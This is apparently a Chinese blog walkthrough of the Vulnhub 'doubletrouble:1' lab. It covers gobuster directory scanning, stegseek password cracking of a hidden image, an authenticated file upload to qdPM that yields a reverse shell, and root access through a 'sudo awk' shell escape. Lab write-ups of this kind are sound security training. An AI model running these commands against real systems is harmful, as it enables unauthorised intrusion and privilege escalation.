vulnhunb之doubletrouble:1

最新推荐文章于 2024-05-20 15:38:32 发布
最新推荐文章于 2024-05-20 15:38:32 发布
阅读量1.6k 收藏
点赞数
分类专栏: 网络安全 文章标签: linux web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qwweggfe/article/details/120369515
版权

由于这个靶机比较简单,所以我就直接写渗透过程了:

首先进行ip扫描

 于是打开网页进行查看

 发现他是qdPM 9.1搭建,我在网上查找发他有远程文件上传的漏洞,但是我们又没有用户名密码,于是我进行目录扫描

NVD - CVE-2020-7246

gobuster dir -r -u http://192.168.181.166/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,bak

 于是我在/secret下发现一个图片

 其他目录没有发现其他漏洞,于是我认为这个图片是有隐写的

如何使用Stegseek破解经过Steghide隐写的数据 | 演道网

上面的网页是工具下载的地址,他是一个基于steghigh的一个快速扫描的工具

wget http://192.168.181.166/secret/doubletrouble.jpg

stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt/rockyou.txt -xf output

 

 于是我查看你output

发现了一个用户名密码,于是我们进行登录

登录成功 ,于是我进行文件上传

首先在kali上开启http的服务·

python3 -m http.server 4444

 

进行文件上传

 文件上传成功

 运行shell并进行shell反弹

 查看当前的用户

python -c 'import pty; pty.spawn("/bin/bash")'

 

于是进行提权

先查看一个有没有可以提权的工具

但是好像没有,于是我使用

sudo -l

 

于是我查看提权的命令

https://gtfobins.github.io/gtfobins/awk/#sudo

sudo awk 'BEGIN {system("/bin/sh")}'

 于是获得了root权限

 

我带的我们
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
stegseek:世界上最快的Steghide饼干,每秒可读取数百万个密码
03-31
:high_voltage: Stegseek Stegseek是一种快如闪电的Steghide饼干,可用于从文件中提取隐藏数据。 它是作为原始steghide项目的一个分支而构建的,因此,它比其他饼干要快数千倍,并且可以在2秒钟内遍历整个rockyou.txt *。 Stegseek还可以用于在没有密码的情况下提取steghide元数据,该密码可以用于测试文件是否包含steghide数据。 * rockyou.txt是一个著名的密码列表,其中包含超过1400万个密码。 演示:随机的rockyou.txt密码(实时) 跳至“以获取一些原始数据。 :wrench: 安装 以下说明将引导您完成安装过程。 或者,您可以在Docker容器中运行Stegseek。 跳至以获取说明。 发行版 Linux 在Ubuntu和其他基于Debian的系统上,可以使用提供的.deb软件包进行安装: 下载最新的 使用sudo apt in
DoubleTrouble:Bootcamp Innopolis项目2015
05-20
1. `src`目录:存放所有Java源代码,按照包结构组织。 2. `resources`目录:存储非代码资源,如配置文件、图片等。 3. `build.gradle`或`pom.xml`:构建文件,用于自动化构建和依赖管理,前者对应Gradle,后者对应...
VulnHun实战——DerpNStink:1
m0_63200360的博客
05-22 344
扫描站点漏洞:wpscan --url http://derpnstink.local/weblog/ --api-token HyETL1kAFHUZersgVa8wZnb2ysXXswzJTL2uaQG4fVw。设置获取IP方式为NAT,然后扫描NAT 所在的网段:nmap -sn 192.168.27.0/24。扫描靶机网站目录:dirb http://192.168.27.148/扫描靶机端口开启哪些端口:nmap -p- 192.168.27.148。192.168.27.148为靶机IP。
如何使用Stegseek解密并提取隐写工具Steghide隐藏的内容
最新发布
FreeBuf_的博客
05-20 1001
该工具一开始作为Steghide项目的分支进行开发,因此该工具的运行速度非常快,要比其他破解工具快好几千倍,并且能够在不到两秒的时间里运行完整个rockyou.txt(rockyou.txt是一个包含了1400万个密码的著名字典)。Stegseek是一款针对Steghide的隐藏数据提取工具,该工具可以对经过Steghide工具处理过的内容进行分析,并从目标文件中提取出隐藏数据。-sf, --stegofile 选择一个stego文件。
隐写工具Steghide使用教程(win)
热门推荐
Amherstieae的博客
05-16 1万+
害,菜鸡今天又来写博客了 前面先来说点废话 今天在buu刷题遇到了这个工具,网上很多师傅的博客讲的都是Linux下的安装使用教程,现在记录一下我在win下学习过程纪录在此(o(╥﹏╥)o一把辛酸泪) 0x01先来扯两句Kali的 Kali安装命令 apt-get install steghide 使用命令 将隐藏信息从载体中分离出来 steghide extract -sf test.jpg -p 123456 #-sf 参数 #test.jpg 图片名称 #-p 密码参数,后面空格跟密码,无密码可不
vulnhub靶机Dr4g0n b4ll :1渗透笔记
m0_64122957的博客
05-17 951
https://note.youdao.com/s/aFd9cC57https://note.youdao.com/s/aFd9cC57
探索隐藏的秘密:StegSeek - 图像隐写术检测工具
gitblog_00016的博客
04-11 519
探索隐藏的秘密:StegSeek - 图像隐写术检测工具 项目地址:https://gitcode.com/RickdeJager/stegseek 在数字时代,信息的安全与隐私保护变得越来越重要。一种被称为图像隐写术的技术,允许人们在看似普通的图片中隐藏秘密数据。而今天我们要介绍的是一个名为StegSeek的开源项目,它是一个强大的图像隐写检测工具,帮助安全专家和爱好者发现潜在的隐藏信息。 项目...
doubletrouble:html5 w vim快捷方式中的两人游戏
05-26
双重麻烦 带有html5 w / vim快捷键的... 要开始玩,请抓住一个朋友并前往 如果您有兴趣帮助: git clone https://github.com/jonathanballs/doubletrouble.git cd doubletrouble npm install . 启动服务器 node .
vulnhub-doubletrouble靶场
leo788的博客
02-18 578
这个靶场可以学到很多方法:1.使用stegseek工具对于隐写术的密码进行爆破;2.通过searchsploit查找开源CMS对应版本漏洞进行漏洞利用;3.使用sqlmap进行sql注入盲注;4.脏牛提权>FObins提权。
vulnhub-doubletrouble
weixin_50683638的博客
12-08 429
靶机:http://www.vulnhub.com/entry/doubletrouble-1,743/ 网络模式:nat 攻击机kali(nat) 1,扫描靶机IP 2,扫描存活端口 3,目录扫描,查看有用的信息 sudo arp-scan -l扫描同网段的靶机ip nmap -P 1-65535 -A 192.168.6.13722,80端口 访问 dirb http://192.168.6.137扫描目录看到两个比较特殊的文件secret,uploads 访问,看到一张图片,查看图片下载下来
Vulnhun_VULNCMS: 1
qq_45434762的博客
06-26 521
主机信息kali:192.168.1.12 VULNCMS: 1:192.168.1.6 信息收集使用netdiscover发现目标主机netdiscover -r 192.168.1.0...
靶机渗透练习63-doubletrouble
hirak0的博客
04-20 3185
靶机描述 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. This works
OpenSMTPD 远程命令执行漏洞 (CVE-2020-7247)
EC_Carrot的博客
07-18 1658
漏洞详细 OpenBSD是加拿大OpenBSD项目组的一套跨平台的、基于BSD的类UNIX操作系统。 OpenSMTPD 6.6版本(用于OpenBSD 6.6版本和其他产品)中的smtp_session.c文件的‘smtp_mailaddr’函数存在安全漏洞。远程攻击者可通过特制的SMTP session利用该漏洞以root权限执行任意命令。 漏洞复现 我使用的是vulhub的环境,环境内自带poc.py文件 使用poc.py来执行命令: python3 poc.py your-ip 8825 <c
CVE-2020-17519 漏洞复现
weixin_43885355的博客
01-31 1312
CVE-2020-17519 0x00 简介 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 0x01 漏洞概述 CVE-2020-17519 任意文件读取漏洞 Apache Flink 1.11.0中引入了一项更新,该更新在1.11.1及更高的版本和1.11.2中发布。 该项更新允许攻击者通过JobManager进程的REST API读取JobManag
CVE-2020-24616: Jackson 多个反序列化安全漏洞通告
爱国小白帽
08-27 4015
360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-082701 报告来源:360CERT 报告作者:360CERT 更新日期:2020-08-27 0x01 漏洞简述 2020年08月27日,360CERT监测发现jackson-databind 发布了 jackson-databind 序列化漏洞 的风险通告,该漏洞编号为 CVE-2020-24616 ,漏洞等级:高危,漏洞评分:7.5。 br.com.anteros:Anteros-DB
CVE-2020-7245(CTFd账户接管漏洞)复现
微风飘呀飘
07-03 1788
0x01 漏洞描述 在CTFd v2.0.0-v2.2.2的注册过程中,错误的用户名验证方式会允许攻击者接管任意帐户,前提是用户名已知并且在CTFd平台上启用了电子邮件功能。 0x02 漏洞分析 CTFd v2.0.0版本注册部分的代码 CTFd/CTFd/auth.py#159 CTFd/CTFd/auth.py#207 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
vlunhub系列-dobletrouble靶机
hanjinming110的博客
03-02 269
vlunhub系列之dobletrouble靶机
vulnhub靶机-doubletrouble: 1
yc11223344的博客
08-25 701
攻击机:192.168.100.128靶机:192.168.100.130。
vulnhub之doubletrouble: 1
weixin_54431413的博客
06-05 916
开源项目信息收集 框架漏洞突破边界 利用sudo配置不当进行提权 tabby工具远程连接linux,sftp传输文件 sql之时间盲注拿到密码打点成功 脏牛漏洞提权成功,复原/etc/passwd 改掉root密码
doubletrouble靶机
08-29
第二个地址是https://www.vulnhub.com/entry/doubletrouble-1,743/,可以获取更多有关靶机的描述信息。靶机中包含一个名为"doubletrouble"的数据库,其中有一个名为"users"的表。你可以使用sqlmap等工具对该表进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值